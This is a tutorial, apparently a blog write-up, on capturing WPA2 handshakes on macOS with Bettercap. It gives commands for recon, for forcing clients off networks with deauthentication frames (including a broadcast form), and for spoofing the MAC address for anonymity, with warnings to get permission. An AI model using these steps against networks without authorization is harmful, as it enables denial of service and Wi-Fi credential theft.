Capturing WPA2 handshakes on macOS Catalina with Bettercap
Probably all Apple computers with wireless cards are capable to use monitoring and de-authentication mode. Please note that de-authentication it’s the same as a denial of service. It’s illegal in many places and you might get in trouble. So, make sure you have permission to do so.
It’s interesting to look around or troubleshoot wireless connectivity issues. Apple macOS has a “Wireless Diagnostics” app and I noticed that you can do monitoring and scan, measuring the signal strength, etc.
Also, there is a native command-line tool, airport (and a guide [1] how to capture WPA with it).
In this write-up, I will focus on capturing WPA handshakes with MacBook Pro and Bettercap [2].
Prerequisites
You need the Homebrew package manager [3] installed. If you don’t have it, use the one-liner below to install it. It will also install Xcode command line tools and all necessary dependencies. You will need to enter your administrator password and it will take up to 5 minutes:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
Installation
Once you have Homebrew you proceed with the command below to install Bettercap:
brew install bettercap
Once it’s installed, you need to install and update caplets
. Bettercap requires sudo
privileges:
sudo bettercap -eval "caplets.update; ui.update; q"
Capturing
Now, we can run Bettercap to look at what is around us. Please note that as an interface adapter I am using an old MacBook Pro from 2012, which has the ethernet network adapter as en0
and the Wireless adapter as en1
. In your case, it might be en0
:
sudo bettercap -caplet http-ui -iface en1
This will start the program with the web interface running, so you only need to open in your browser:
http://127.0.0.1/
Enable monitoring mode in the WiFi tab and press the play button or in terminal enter the command below:
wifi.recon on
WPA2 PSK and PMK authentification process require a 4-way handshake to exchange a secret key for the first time. Once you have it, you no longer need a 4-way handshake to verify your device, it’s enough to capture a 2-ways handshake.
Now you can be capturing wireless traffic all day long but unless the communication is terminated with a deauthentification frame [4] it’s useless. Bettercap has a feature to deauthentificate clients from the station. Again! Make sure you have permission to do so:
wifi.deauth 11:11:11:11:11:11
You can also to opt the broadcast to address FF:FF:FF:FF:FF:FF.
Automation
Now that we know how it works, we can modify our caplet for daily usage. Basically we can make it like pwnagotchi
, but we will call it pwnacintosh
:)
I am adding extra security, anonymization, and service configurations.
No need to create a new caplet we can modify an existing HTTPS caplet:
sudo nano /usr/local/share/bettercap/caplets/https-ui.cap
I just need to change the username and password from the defaults user
and pass
:
set api.rest.username pwnacintosh
set api.rest.password pwnacintosh
Add wireless interface some anonymity:
set wifi.interface en1
set mac.changer.iface en1
set mac.changer.address f0:a1:c2:34:a5:f6
And the last thing we need to do is adding the commands to enable services:
mac.changer on
wifi.recon on
Save and close. We will make another copy of https-ui caplet. Later if you update caplets, it will reset to defaults:
cd /usr/local/share/bettercap/caplets/
sudo cp https-ui.cap pwnacintosh.cap
It’s time to run Bettercap with one argument. The SSL certificates will be generated automatically for the first time:
sudo bettercap -caplet pwnacintosh
Use your current IP or localhost address to open Bettercap Web Application:
https://127.0.0.1/